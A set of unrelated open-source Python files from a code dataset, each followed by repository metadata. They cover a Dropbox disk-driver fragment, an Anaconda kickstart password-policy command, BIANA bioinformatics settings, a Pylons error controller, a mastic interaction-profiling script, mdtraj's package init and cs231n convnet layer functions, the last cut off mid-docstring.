self.sector_size = sector_size
super(DropboxDiskDriver,self).__init__(size,sector_size,self.cache_size)
def delete_disk(self):
self.client.file_delete("/config")
for i in range(0,int(self.size/self.sector_size)):
self.client.file_delete(self.get_sector_name(i))
self.size = 0
self.sector_size = 0
|
uzyszkodnik/blockcrypt
|
src/DiskDrivers.py
|
Python
|
bsd-3-clause
| 6,850
|
[
"VisIt"
] |
bef6eaff7b222425db031945faf8ee9207df124ccf63a0bac61d84398f70ae59
|
#
# Brian C. Lane <bcl@redhat.com>
#
# Copyright 2015 Red Hat, Inc.
#
# This copyrighted material is made available to anyone wishing to use, modify,
# copy, or redistribute it subject to the terms and conditions of the GNU
# General Public License v.2. This program is distributed in the hope that it
# will be useful, but WITHOUT ANY WARRANTY expressed or implied, including the
# implied warranties of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 51
# Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. Any Red Hat
# trademarks that are incorporated in the source code or documentation are not
# subject to the GNU General Public License and may only be used or replicated
# with the express permission of Red Hat, Inc.
#
from pykickstart.base import BaseData, KickstartCommand
from pykickstart.errors import KickstartParseError, formatErrorMsg
from pykickstart.options import KSOptionParser
import warnings
from pyanaconda.i18n import _
class F22_PwPolicyData(BaseData):
""" Kickstart Data object to hold information about pwpolicy. """
removedKeywords = BaseData.removedKeywords
removedAttrs = BaseData.removedAttrs
def __init__(self, *args, **kwargs):
BaseData.__init__(self, *args, **kwargs)
self.name = kwargs.get("name", "")
self.minlen = kwargs.get("minlen", 8)
self.minquality = kwargs.get("minquality", 50)
self.strict = kwargs.get("strict", True)
self.changesok = kwargs.get("changesok", False)
self.emptyok = kwargs.get("emptyok", True)
def __eq__(self, y):
if not y:
return False
return self.name == y.name
def __ne__(self, y):
return not self == y
def __str__(self):
retval = BaseData.__str__(self)
if self.name != "":
retval += "pwpolicy"
retval += self._getArgsAsStr() + "\n"
return retval
def _getArgsAsStr(self):
retval = ""
retval += " %s" % self.name
retval += " --minlen=%d" % self.minlen
retval += " --minquality=%d" % self.minquality
if self.strict:
retval += " --strict"
else:
retval += " --notstrict"
if self.changesok:
retval += " --changesok"
else:
retval += " --nochanges"
if self.emptyok:
retval += " --emptyok"
else:
retval += " --notempty"
return retval
class F22_PwPolicy(KickstartCommand):
""" Kickstart command implementing password policy. """
removedKeywords = KickstartCommand.removedKeywords
removedAttrs = KickstartCommand.removedAttrs
def __init__(self, writePriority=0, *args, **kwargs):
KickstartCommand.__init__(self, writePriority, *args, **kwargs)
self.op = self._getParser()
self.policyList = kwargs.get("policyList", [])
def __str__(self):
retval = ""
for policy in self.policyList:
retval += policy.__str__()
return retval
def _getParser(self):
op = KSOptionParser()
op.add_option("--minlen", type="int")
op.add_option("--minquality", type="int")
op.add_option("--strict", action="store_true")
op.add_option("--notstrict", dest="strict", action="store_false")
op.add_option("--changesok", action="store_true")
op.add_option("--nochanges", dest="changesok", action="store_false")
op.add_option("--emptyok", action="store_true")
op.add_option("--notempty", dest="emptyok", action="store_false")
return op
def parse(self, args):
(opts, extra) = self.op.parse_args(args=args, lineno=self.lineno)
if len(extra) != 1:
raise KickstartParseError(formatErrorMsg(self.lineno, msg=_("policy name required for %s") % "pwpolicy"))
pd = self.handler.PwPolicyData()
self._setToObj(self.op, opts, pd)
pd.lineno = self.lineno
pd.name = extra[0]
# Check for duplicates in the data list.
if pd in self.dataList():
warnings.warn(_("A %(command)s with the name %(policyName)s has already been defined.") % {"command": "pwpolicy", "policyName": pd.name})
return pd
def dataList(self):
return self.policyList
def get_policy(self, name):
""" Get the policy by name
:param str name: Name of the policy to return.
"""
policy = [p for p in self.policyList if p.name == name]
if policy:
return policy[0]
else:
return None
|
AdamWill/anaconda
|
pyanaconda/pwpolicy.py
|
Python
|
gpl-2.0
| 4,777
|
[
"Brian"
] |
96f0e629e1866e3afe5c66e7c96d9821a49586943c313dc7fea01bc0632ba017
|
"""
BIANA: Biologic Interactions and Network Analysis
Copyright (C) 2009 Javier Garcia-Garcia, Emre Guney, Baldo Oliva
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
# This file contains specific default user parameters used in biana
# DATABASE CONNECTION DEFAULT PARAMETERS
DBNAME = 'biana'
DBUSER = 'root'
DBPASS = 'root'
DBHOST = 'localhost'
DBPORT = None
DBSOCKET = '/home/jgarcia/local/mysql/var/mysql.sock'
MAX_ALIAS_SIZE = 255
EXTERNAL_ENTITY_TYPES = ["protein",
"DNA",
"RNA",
"mRNA",
"tRNA",
"rRNA",
"CDS",
"gene",
"sRNA",
"snRNA",
"snoRNA",
"structure",
"pattern",
"compound",
"drug",
"glycan",
"enzyme",
"relation",
"ontology",
"SCOPElement",
"taxonomyElement",
"PsiMiOboOntologyElement",
"GOElement"
]
EXTERNAL_ENTITY_RELATION_TYPES = [ "interaction",
"no_interaction",
"reaction",
"functional_association",
"cluster",
"homology",
"pathway",
"alignment",
"complex",
"regulation",
"cooperation",
"forward_reaction",
"backward_reaction"
]
# EXTERNAL ENTITY ATTRIBUTE TYPES
EXTERNAL_ENTITY_IDENTIFIER_ATTRIBUTES = [ ("CHEBI", "integer unsigned"),
("COG", "varchar(10)"),
("CYGD", "varchar(15)"), # normally 7 (YDR172w) but sometimes 9 (YLR312w-a) (in mips there are some errors... because of that, we increase it to 15
("DIP", "varchar(6)"), # DIP:216N (~17000 entries)
("EC", "varchar(30)"),
("Encode", "varchar(14)"),
("Ensembl", "varchar(40)"),
("FlyBase", "varchar(13)"),
("GDB", "integer(3) unsigned"),
("GeneID", "integer(4) unsigned"),
("GeneSymbol", "varchar(255)"),
("GenomeReviews", "varchar(15)"),
("GI", "integer(4) unsigned"),
("GO", "integer(3) unsigned"),
("HGNC", "integer(2) unsigned"),
("Homologene", "integer(3) unsigned"),
("HPRD", "integer(3) unsigned"),
("Huge", "smallint unsigned"),
("IMGT", "varchar(10)"),
("IntAct", "integer(3) unsigned"),
("IntEnz", "varchar(10)"),
("InterPro", "varchar(12)"),
#("IPI", "varchar(20)"), # Moved to versionable attributes
("KeggCode", "char(6)"),
("KeggGene", "varchar(155)"),
("Method_id", "integer(2) unsigned"), #psi_mi obo mi code
("MGI", "integer(3) unsigned"),
("MIM", "integer(3) unsigned"),
("MINT", "integer(3) unsigned"),
("MIPS", "integer(2) unsigned"),
("OrderedLocusName", "varchar(255)"),
("ORFName", "varchar(255)"), # Actually at most 7: YAL213W: Yeast (Y) 1st (A) chromosome's left (L) at 213th (213) position on Watson (W) strand
("PFAM", "varchar(255)"),
("PIR", "varchar(8)"),
("PRINTS", "varchar(15)"),
("PRODOM", "varchar(15)"),
("Prosite", "varchar(255)"),
("psimi_name", "varchar(255)"),
("PubChemCompound", "integer(3) unsigned"),
("Ratmap", "integer(3) unsigned"),
("Reactome", "integer unsigned"),
("RGD", "integer unsigned"),
("SCOP", "integer(3) unsigned"),
("SGD", "varchar(15)"),
("STRING", "varchar(25)"), # gives ordered locus names, so called ensembl codes and many more
("Tair", "varchar(100)"),
("TaxID", "integer(3) unsigned"),
("Unigene", "varchar(10)"),
("UniParc", "binary(10)"),
("UniprotEntry", "varchar(15)"),
("WormBaseGeneID", "integer(3) unsigned"),
("WormBaseSequenceName", "varchar(255)"),
("YPD", "varchar(15)"),
("iRefIndex_ROGID", "varchar(255)"),
("iRefIndex_RIGID", "varchar(255)"),
]
EXTERNAL_ENTITY_GENERAL_ATTRIBUTES = []
PROMISCUOUS_EXTERNAL_ENTITY_TYPES_DICT = [ ("SCOPElement", "PDB") ]
VALID_IDENTIFIER_REFERENCE_TYPES = ["unique", "previous", "alias", "cross-reference", "synonym","short-name", "exact_synonym", "related_synonym", "broad_synonym", "narrow_synonym"]
CROSSABLE_ATTRIBUTES = set(["sequence","taxid","ipi","uniprotentry","uniprotaccession","genesymbol","geneid","refseq","ec"])
EXTERNAL_ENTITY_VERSIONABLE_IDENTIFIER_ATTRIBUTE_TYPES = [("AccessionNumber", "varchar(15)"),
("RefSeq", "varchar(15)"),
("TIGR", "varchar(255)"),
("UniprotAccession", "varchar(9)"),
("IPI", "varchar(20)"),
]
EXTERNAL_ENTITY_DESCRIPTIVE_SEARCHABLE_ATTRIBUTE_TYPES = [("Disease", "text"),
("Function", "text"),
("Keyword", "varchar(255)"),
("Description", "text"),
("SubcellularLocation", "text"),
("Name", "varchar(255)")
]
EXTERNAL_ENTITY_DESCRIPTIVE_ATTRIBUTE_TYPES = [("Pubmed", "integer(3) unsigned"),
("Formula", "varchar(255)")
]
EXTERNAL_ENTITY_NUMERIC_ATTRIBUTE_TYPES = [("Pvalue", "double"),
("Score", "double"),
("iRefIndex_lpr", "integer unsigned"),
("iRefIndex_hpr", "integer unsigned"),
("iRefIndex_np", "integer unsigned"),
("STRINGScore", "int(2)"),
("STRINGScore_neighborhood","int(2)"),
("STRINGScore_fusion","int(2)"),
("STRINGScore_cooccurence","int(2)"),
("STRINGScore_coexpression","int(2)"),
("STRINGScore_experimental","int(2)"),
("STRINGScore_db", "int(2)"),
("STRINGScore_textmining","int(2)")]
EXTERNAL_ENTITY_SPECIAL_ATTRIBUTE_TYPES = { "PDB": {"fields": [ ("value","char(4)"),
("chain","varchar(4)",True),
("pdb_range","varchar(255)",True) ],
"indices": ("value","chain","pdb_range")},
"ProteinSequence": { "fields": [ ("value","binary(16)"),
("sequenceType","ENUM(\"peptide\")",False) ],
"indices": ("value",) },
"NucleotideSequence": { "fields": [ ("value","binary(16)"),
("sequenceType","ENUM(\"dna\",\"rna\")",False)],
"indices": ("value",)},
"SequenceMap": { "fields": [ ("value","binary(16)"),
("seq_range","varchar(255)",False) ],
"indices": ()},
"Pattern": { "fields": [ ("value","varchar(255)"),
("patternExpression","varchar(255)",False)],
"indices": ("value",)}, # Stores a regex
#"STRINGScore": { "fields": [ ("value","int(2)"), # moved to regular attributes as seperate score attributes
# ("neighborhood","int(2)",True),
# ("fusion","int(2)",True),
# ("cooccurence","int(2)",True),
# ("coexpression","int(2)",True),
# ("experimental","int(2)",True),
# ("db", "int(2)", True),
# ("textmining","int(2)",True)],
# "indices": () }
}
# EXTERNAL ENTITY RELATION PARTICIPANT ATTRIBUTE TYPES
EXTERNAL_ENTITY_RELATION_PARTICIPANT_ATTRIBUTE_TYPES = [ ("cardinality", "smallint unsigned"),
("detection_method", "smallint unsigned"),
("GO", "integer(3) unsigned"),
("KeggCode", "varchar(6)"),
("role", "ENUM(\"batch\",\"product\",\"substrate\",\"catalyst\",\"prey\",\"bait\",\"neutral\",\"acceptor\",\"donor\",\"self\",\"ancillary\",\"enzyme\",\"enzyme target\",\"inhibitor\",\"cofactor\",\"stimulator\",\"activates\",\"inhibits\",\"allosteric_inhibition\",\"competitive_inhibition\",\"irreversible_inhibition\",\"non_competitive_inhibition\",\"uncompetitive_inhibition\",\"allosteric_activation\",\"nonallosteric_activation\",\"transcription_factor\",\"regulated_DNA\",\"onward_effect\",\"reverse_effect\")")
]
# EXTERNAL SOFTWARE EXECUTABLES
CLUSTALW_EXEC = '/soft/bio/sequence/clustalw' # '/usr/local/bin/clustalw'
FORMATDB_EXEC = '/soft/bio/sequence/blast-2.2.17/bin/formatdb'
BLASTALL_EXEC = '/soft/bio/sequence/blast-2.2.17/bin/blastall'
BL2SEQ_EXEC = '/soft/bio/sequence/blast-2.2.17/bin/bl2seq'
TCOFFEE_EXEC = '/soft/bio/sequence/t-coffee-6.92' #'/Users/javigx2/phD/external_software/tcoffee/T-COFFEE_distribution_Version_7.04/bin/macosx/t_coffee'
#DSSP_EXEC = '/Users/javigx2/phD/external_software/dssp/dssp/dsspcmbi'
DSSP_EXEC = '/soft/bio/structure/dssp/dsspcmbi'
#CD_HIT_PATH = '/home/emre/lib/cd-hit/'
CD_HIT_PATH = '/soft/bio/sequence/cd-hit/'
#CD_HIT_PATH = '/home/jgarcia/programs/CD-HIT/cd-hit/'
# DEFAULT TEMPORAL DATA PATHS
TEMPORAL_PATH = None
|
emreg00/biana
|
biana/biana_globals.py
|
Python
|
gpl-3.0
| 14,395
|
[
"BLAST"
] |
3e109d7210010add83336b8883503ee57434c2bce2fa5666c5febf1d898f195e
|
import os.path
import paste.fileapp
from pylons.middleware import error_document_template, media_path
from dirac.lib.base import *
class ErrorController(BaseController):
"""Generates error documents as and when they are required.
The ErrorDocuments middleware forwards to ErrorController when error
related status codes are returned from the application.
This behaviour can be altered by changing the parameters to the
ErrorDocuments middleware in your config/middleware.py file.
"""
def document(self):
"""Render the error document"""
page = error_document_template % \
dict(prefix=request.environ.get('SCRIPT_NAME', ''),
code=request.params.get('code', ''),
message=request.params.get('message', ''))
return page
def img(self, id):
"""Serve Pylons' stock images"""
return self._serve_file(os.path.join(media_path, 'img', id))
def style(self, id):
"""Serve Pylons' stock stylesheets"""
return self._serve_file(os.path.join(media_path, 'style', id))
def _serve_file(self, path):
"""Call Paste's FileApp (a WSGI application) to serve the file
at the specified path
"""
fapp = paste.fileapp.FileApp(path)
return fapp(request.environ, self.start_response)
|
DIRACGrid/DIRACWeb
|
dirac/controllers/error.py
|
Python
|
gpl-3.0
| 1,344
|
[
"DIRAC"
] |
f44a175bdb0b751f5c3dad45bd2a2e72ff777e633c06b8db51acb1ffcdf7d1f5
|
import pandas as pd
import pickle
from rdkit import Chem
from rdkit.Chem import AllChem
import os.path as osp
import mastic.selection as masticsel
import mastic.molecule as masticmol
import mastic.system as masticsys
import mastic.interactions as masticinx
from mastic.interactions.hydrogen_bond import HydrogenBondType
from mastic.interfaces.rdkit import RDKitMoleculeWrapper
import mastic.config.interactions as masticinxconfig
import mastic.tests.data as masticdata
from rdkit import Chem
# without Hs straight from pdb
BEN_rdkit = Chem.MolFromPDBBlock(masticdata.BEN_3ptb, removeHs=False, sanitize=True)
trypsin_rdkit = Chem.MolFromPDBBlock(masticdata.trypsin_3ptb, removeHs=False, sanitize=True)
# with hydrogens added files
BEN_Hs_rdkit = Chem.MolFromPDBBlock(masticdata.BEN_Hs_3ptb, removeHs=False, sanitize=True)
trypsin_Hs_rdkit = Chem.MolFromPDBBlock(masticdata.trypsin_Hs_3ptb, removeHs=False, sanitize=True)
BEN_rdkit_wrapper = RDKitMoleculeWrapper(BEN_rdkit, mol_name="BEN")
trypsin_rdkit_wrapper = RDKitMoleculeWrapper(trypsin_rdkit, mol_name="Trypsin")
BEN_coords = BEN_rdkit_wrapper.get_conformer_coords(0)
trypsin_coords = trypsin_rdkit_wrapper.get_conformer_coords(0)
member_coords = [BEN_coords, trypsin_coords]
BEN_Molecule = masticdata.BEN_Molecule
Trypsin_Molecule = masticdata.Trypsin_Molecule
BEN_mol = BEN_Molecule.to_molecule(BEN_coords)
trypsin_mol = Trypsin_Molecule.to_molecule(trypsin_coords)
member_types = [BEN_Molecule, Trypsin_Molecule]
system_attrs = {'name' : 'trypsin-benzamidine-complex'}
Trypsin_Benzamidine_System = masticsys.SystemType("Trypsin_Benzamidine_System",
member_types=member_types,
**system_attrs)
print("making an AssociationType of the receptor and ligand in the Trypsin_Benzamidine_System")
rec_lig_attrs = {'name' : 'trypsin-benzamidine-complex'}
# rec_lig_attrs['ligand_type'] = ben_type
# rec_lig_attrs['receptor_type'] = trypsin_type
selection_map = {0 : None, 1 : None}
selection_types = [None, None]
Trypsin_Benzamidine_Association = \
masticsys.AssociationType("Trypsin_Benzamidine_Association",
system_type=Trypsin_Benzamidine_System,
selection_map=selection_map,
selection_types=selection_types,
**rec_lig_attrs)
# add it to the SystemType
Trypsin_Benzamidine_System.add_association_type(Trypsin_Benzamidine_Association)
# now when we make the system the selections are put into an
# Association that can be profiled
trypsys = Trypsin_Benzamidine_System.to_system(member_coords)
# from mastic.molecule import Molecules
print("testing Hbond interaction between molecules in the receptor ligand association")
tryp_ben_assoc = trypsys.associations[0]
intermember_key_pairs, intermember_interactions = \
tryp_ben_assoc.profile_interactions([HydrogenBondType])
intramember_key_pairs, intramember_interactions = \
tryp_ben_assoc.profile_interactions([HydrogenBondType],
intramember_interactions=True)
intermember_inx_class_df = pd.DataFrame([inx.interaction_class.record for
inx in intermember_interactions[HydrogenBondType]])
intramember_inx_class_df = pd.DataFrame([inx.interaction_class.record for
inx in intramember_interactions[HydrogenBondType]])
intermember_inx_df = pd.DataFrame([inx.record for inx in
intermember_interactions[HydrogenBondType]])
intramember_inx_df = pd.DataFrame([inx.record for inx in
intramember_interactions[HydrogenBondType]])
|
salotz/mast
|
prototypes/interactions_example.py
|
Python
|
mit
| 3,748
|
[
"RDKit"
] |
9b09dc30a16c55f50f3916667f23fb6af7b4c38b1e0aaa5d65a173cc4f8d7213
|
##############################################################################
# MDTraj: A Python Library for Loading, Saving, and Manipulating
# Molecular Dynamics Trajectories.
# Copyright 2012-2013 Stanford University and the Authors
#
# Authors: Robert McGibbon
# Contributors:
#
# MDTraj is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as
# published by the Free Software Foundation, either version 2.1
# of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with MDTraj. If not, see <http://www.gnu.org/licenses/>.
##############################################################################
"""The mdtraj package contains tools for loading and saving molecular dynamics
trajectories in a variety of formats, including Gromacs XTC & TRR, CHARMM/NAMD
DCD, AMBER BINPOS, PDB, and HDF5.
"""
from mdtraj.formats.registry import _FormatRegistry
from mdtraj.formats.xtc import load_xtc
from mdtraj.formats.trr import load_trr
from mdtraj.formats.hdf5 import load_hdf5
from mdtraj.formats.lh5 import load_lh5
from mdtraj.formats.netcdf import load_netcdf
from mdtraj.formats.mdcrd import load_mdcrd
from mdtraj.formats.dcd import load_dcd
from mdtraj.formats.binpos import load_binpos
from mdtraj.formats.pdb import load_pdb
from mdtraj.formats.arc import load_arc
from mdtraj.formats.openmmxml import load_xml
from mdtraj.formats.prmtop import load_prmtop
from mdtraj.formats.psf import load_psf
from mdtraj.formats.mol2 import load_mol2
from mdtraj.formats.amberrst import load_restrt, load_ncrestrt
from mdtraj.formats.lammpstrj import load_lammpstrj
from mdtraj.formats.dtr import load_dtr
from mdtraj.formats.xyzfile import load_xyz
from mdtraj.core import element
from mdtraj._rmsd import rmsd
from mdtraj._lprmsd import lprmsd
from mdtraj.core.topology import Topology
from mdtraj.geometry import *
from mdtraj.core.trajectory import *
from mdtraj.nmr import *
import mdtraj.reporters
def test(label='full', verbose=2):
"""Run tests for mdtraj using nose.
Parameters
----------
label : {'fast', 'full'}
Identifies the tests to run. The fast tests take about 10 seconds,
and the full test suite takes about two minutes (as of this writing).
verbose : int, optional
Verbosity value for test outputs, in the range 1-10. Default is 2.
"""
import mdtraj
from mdtraj.testing.nosetester import MDTrajTester
tester = MDTrajTester(mdtraj)
return tester.test(label=label, verbose=verbose, extra_argv=('--exe',))
# prevent nose from discovering this function, or otherwise when its run
# the test suite in an infinite loop
test.__test__ = False
def capi():
import os
import sys
module_path = sys.modules['mdtraj'].__path__[0]
return {
'lib_dir': os.path.join(module_path, 'core', 'lib'),
'include_dir': os.path.join(module_path, 'core', 'lib'),
}
|
hainm/mdtraj
|
mdtraj/__init__.py
|
Python
|
lgpl-2.1
| 3,268
|
[
"Amber",
"CHARMM",
"Gromacs",
"MDTraj",
"NAMD",
"NetCDF"
] |
a2894037e71846b4af6d0237703c82c3fea032f56e2e3fa5624fe67acbd2d059
|
import numpy as np
from cs231n.layers import *
from cs231n.fast_layers import *
from cs231n.layer_utils import *
def two_layer_convnet(X, model, y=None, reg=0.0, dropout=1.0):
"""
Compute the loss and gradient for a simple two-layer ConvNet. The architecture
is conv-relu-pool-affine-softmax, where the conv layer uses stride-1 "same"
convolutions to preserve the input size; the pool layer uses non-overlapping
2x2 pooling regions. We use L2 regularization on both the convolutional layer
weights and the affine layer weights.
Inputs:
- X: Input data, of shape (N, C, H, W)
- model: Dictionary mapping parameter names to parameters. A two-layer Convnet
expects the model to have the following parameters:
- W1, b1: Weights and biases for the convolutional layer
- W2, b2: Weights and biases for the affine layer
- y: Vector of labels of shape (N,). y[i] gives the label for the point X[i].
- reg: Regularization strength.
Returns:
If y is None, then returns:
- scores: Matrix of scores, where scores[i, c] is the classification score for
the ith input and class c.
If y is not None, then returns a tuple of:
- loss: Scalar value giving the loss.
- grads: Dictionary with the same keys as model, mapping parameter names to
their gradients.
"""
# Unpack weights
W1, b1, W2, b2 = model['W1'], model['b1'], model['W2'], model['b2']
N, C, H, W = X.shape
# We assume that the convolution is "same", so that the data has the same
# height and width after performing the convolution. We can then use the
# size of the filter to figure out the padding.
conv_filter_height, conv_filter_width = W1.shape[2:]
assert conv_filter_height == conv_filter_width, 'Conv filter must be square'
assert conv_filter_height % 2 == 1, 'Conv filter height must be odd'
assert conv_filter_width % 2 == 1, 'Conv filter width must be odd'
conv_param = {'stride': 1, 'pad': (conv_filter_height - 1) / 2}
pool_param = {'pool_height': 2, 'pool_width': 2, 'stride': 2}
dropout_param = {'p': dropout}
dropout_param['mode'] = 'test' if y is None else 'train'
# Compute the forward pass
a1, cache1 = conv_relu_pool_forward(X, W1, b1, conv_param, pool_param)
d1, cache2 = dropout_forward(a1, dropout_param)
scores, cache3 = affine_forward(d1, W2, b2)
if y is None:
return scores
# Compute the backward pass
data_loss, dscores = softmax_loss(scores, y)
# Compute the gradients using a backward pass
dd1, dW2, db2 = affine_backward(dscores, cache3)
da1 = dropout_backward(dd1, cache2)
dX, dW1, db1 = conv_relu_pool_backward(da1, cache1)
# Add regularization
dW1 += reg * W1
dW2 += reg * W2
reg_loss = 0.5 * reg * sum(np.sum(W * W) for W in [W1, W2])
loss = data_loss + reg_loss
grads = {'W1': dW1, 'b1': db1, 'W2': dW2, 'b2': db2}
return loss, grads
def init_two_layer_convnet(weight_scale=1e-3, bias_scale=0, input_shape=(3, 32, 32),
num_classes=10, num_filters=32, filter_size=5):
"""
Initialize the weights for a two-layer ConvNet.
Inputs:
- weight_scale: Scale at which weights are initialized. Default 1e-3.
- bias_scale: Scale at which biases are initialized. Default is 0.
- input_shape: Tuple giving the input shape to the network; default is
(3, 32, 32) for CIFAR-10.
- num_classes: The number of classes for this network. Default is 10
(for CIFAR-10)
- num_filters: The number of filters to use in the convolutional layer.
- filter_size: The width and height for convolutional filters. We assume that
all convolutions are "same", so we pick padding to ensure that data has the
same height and width after convolution. This means that the filter size
must be odd.
Returns:
A dictionary mapping parameter names to numpy arrays containing:
- W1, b1: Weights and biases for the convolutional layer
- W2, b2: Weights and biases for the fully-connected layer.
"""
C, H, W = input_shape
assert filter_size % 2 == 1, 'Filter size must be odd; got %d' % filter_size
model = {}
model['W1'] = weight_scale * np.random.randn(num_filters, C, filter_size, filter_size)
model['b1'] = bias_scale * np.random.randn(num_filters)
model['W2'] = weight_scale * np.random.randn(num_filters * H * W / 4, num_classes)
model['b2'] = bias_scale * np.random.randn(num_classes)
return model
def init_three_layer_convnet(input_shape=(3, 32, 32), num_classes=10,
filter_size=5, num_filters=(32, 128),
weight_scale=1e-2, bias_scale=0, dtype=np.float32):
"""
Initialize a three layer ConvNet with the following architecture:
conv - relu - pool - affine - relu - dropout - affine - softmax
The convolutional layer uses stride 1 and has padding to perform "same"
convolution, and the pooling layer is 2x2 stride 2.
Inputs:
- input_shape: Tuple (C, H, W) giving the shape of each training sample.
Default is (3, 32, 32) for CIFAR-10.
- num_classes: Number of classes over which classification will be performed.
Default is 10 for CIFAR-10.
- filter_size: The height and width of filters in the convolutional layer.
- num_filters: Tuple (F, H) where F is the number of filters to use in the
convolutional layer and H is the number of neurons to use in the hidden
affine layer.
- weight_scale: Weights are initialized from a gaussian distribution with
standard deviation equal to weight_scale.
- bias_scale: Biases are initialized from a gaussian distribution with
standard deviation equal to bias_scale.
- dtype: Numpy datatype used to store parameters. Default is float32 for
speed.
"""
C, H, W = input_shape
F1, FC = num_filters
filter_size = 5
model = {}
model['W1'] = np.random.randn(F1, 3, filter_size, filter_size)
model['b1'] = np.random.randn(F1)
model['W2'] = np.random.randn(H * W * F1 / 4, FC)
model['b2'] = np.random.randn(FC)
model['W3'] = np.random.randn(FC, num_classes)
model['b3'] = np.random.randn(num_classes)
for i in [1, 2, 3]:
model['W%d' % i] *= weight_scale
model['b%d' % i] *= bias_scale
for k in model:
model[k] = model[k].astype(dtype, copy=False)
return model
def three_layer_convnet(X, model, y=None, reg=0.0, dropout=None):
"""
Compute the loss and gradient for a simple three layer ConvNet that uses
the following architecture:
conv - relu - pool - affine - relu - dropout - affine - softmax
The convolution layer uses stride 1 and sets the padding to achieve "same"
convolutions, and the pooling layer is 2x2 stride 2. We use L2 regularization
on all weights, and no regularization on the biases.
Inputs:
- X: (N, C, H, W) array of input data
- model: Dictionary mapping parameter names to values; it should contain
the following parameters:
- W1, b1: Weights and biases for convolutional layer
- W2, b2, W3, b3: Weights and biases for affine layers
- y: Integer array of shape (N,) giving the labels for the training samples
in X. This is optional; if it is not given then return classification
scores; if it is given then instead return loss and gradients.
- reg: The regularization strength.
- dropout: The dropout parameter. If this is None then we skip the dropout
layer; this allows this function to work even before the dropout layer
has been implemented.
"""
W1, b1 = model['W1'], model['b1']
W2, b2 = model['W2'], model['b2']
W3, b3 = model['W3'], model['b3']
conv_param = {'stride': 1, 'pad': (W1.shape[2] - 1) / 2}
pool_param = {'stride': 2, 'pool_height': 2, 'pool_width': 2}
dropout_param = {'p': dropout}
dropout_param['mode'] = 'test' if y is None else 'train'
a1, cache1 = conv_relu_pool_forward(X, W1, b1, conv_param, pool_param)
a2, cache2 = affine_relu_forward(a1, W2, b2)
if dropout is None:
scores, cache4 = affine_forward(a2, W3, b3)
else:
d2, cache3 = dropout_forward(a2, dropout_param)
scores, cache4 = affine_forward(d2, W3, b3)
if y is None:
return scores
data_loss, dscores = softmax_loss(scores, y)
if dropout is None:
da2, dW3, db3 = affine_backward(dscores, cache4)
else:
dd2, dW3, db3 = affine_backward(dscores, cache4)
da2 = dropout_backward(dd2, cache3)
da1, dW2, db2 = affine_relu_backward(da2, cache2)
dX, dW1, db1 = conv_relu_pool_backward(da1, cache1)
grads = { 'W1': dW1, 'b1': db1, 'W2': dW2, 'b2': db2, 'W3': dW3, 'b3': db3 }
reg_loss = 0.0
for p in ['W1', 'W2', 'W3']:
W = model[p]
reg_loss += 0.5 * reg * np.sum(W * W)
grads[p] += reg * W
loss = data_loss + reg_loss
return loss, grads
def init_five_layer_convnet(input_shape=(3, 64, 64), num_classes=100,
filter_sizes=(5, 5, 5), num_filters=(32, 32, 64, 128),
weight_scale=1e-2, bias_scale=0, dtype=np.float32):
"""
Initialize a five-layer convnet with the following architecture:
[conv - relu - pool] x 3 - affine - relu - dropout - affine - softmax
Each pooling region is 2x2 stride 2 and each convolution uses enough padding
so that all convolutions are "same".
Inputs:
- Input shape: A tuple (C, H, W) giving the shape of each input that will be
passed to the ConvNet. Default is (3, 64, 64) which corresponds to
TinyImageNet.
- num_classes: Number of classes over which classification will be performed.
Default is 100 for TinyImageNet-100-A / TinyImageNet-100-B.
- filter_sizes: Tuple of 3 integers giving the size of the filters for the
three convolutional layers. Default is (5, 5, 5) which corresponds to 5x5
filter at each layer.
- num_filters: Tuple of 4 integers where the first 3 give the number of
convolutional filters for the three convolutional layers, and the last
gives the number of output neurons for the first affine layer.
Default is (32, 32, 64, 128).
- weight_scale: All weights will be randomly initialized from a Gaussian
distribution whose standard deviation is weight_scale.
- bias_scale: All biases will be randomly initialized from a Gaussian
distribution whose standard deviation is bias_scale.
- dtype: numpy datatype which will be used for this network. Float32 is
recommended as it will make floating point operations faster.
"""
C, H, W = input_shape
F1, F2, F3, FC = num_filters
filter_size = 5
model = {}
model['W1'] = np.random.randn(F1, 3, filter_sizes[0], filter_sizes[0])
model['b1'] = np.random.randn(F1)
model['W2'] = np.random.randn(F2, F1, filter_sizes[1], filter_sizes[1])
model['b2'] = np.random.randn(F2)
model['W3'] = np.random.randn(F3, F2, filter_sizes[2], filter_sizes[2])
model['b3'] = np.random.randn(F3)
model['W4'] = np.random.randn(H * W * F3 / 64, FC)
model['b4'] = np.random.randn(FC)
model['W5'] = np.random.randn(FC, num_classes)
model['b5'] = np.random.randn(num_classes)
for i in [1, 2, 3, 4, 5]:
model['W%d' % i] *= weight_scale
model['b%d' % i] *= bias_scale
for k in model:
model[k] = model[k].astype(dtype, copy=False)
return model
def five_layer_convnet(X, model, y=None, reg=0.0, dropout=1.0,
extract_features=False, compute_dX=False,
return_probs=False):
"""
Compute the loss and gradient for a five layer convnet with the architecture
[conv - relu - pool] x 3 - affine - relu - dropout - affine - softmax
Each conv is stride 1 with padding chosen so the convolutions are "same";
all padding is 2x2 stride 2.
We use L2 regularization on all weight matrices and no regularization on
biases.
This function can output several different things:
If y not given, then this function will output extracted features,
classification scores, or classification probabilities depending on the
values of the extract_features and return_probs flags.
If y is given, then this function will output either (loss, gradients)
or dX, depending on the value of the compute_dX flag.
Inputs:
- X: Input data of shape (N, C, H, W)
- model: Dictionary mapping string names to model parameters. We expect the
following parameters:
W1, b1, W2, b2, W3, b3: Weights and biases for the conv layers
W4, b4, W5, b5: Weights and biases for the affine layers
- y: Integer vector of shape (N,) giving labels for the data points in X.
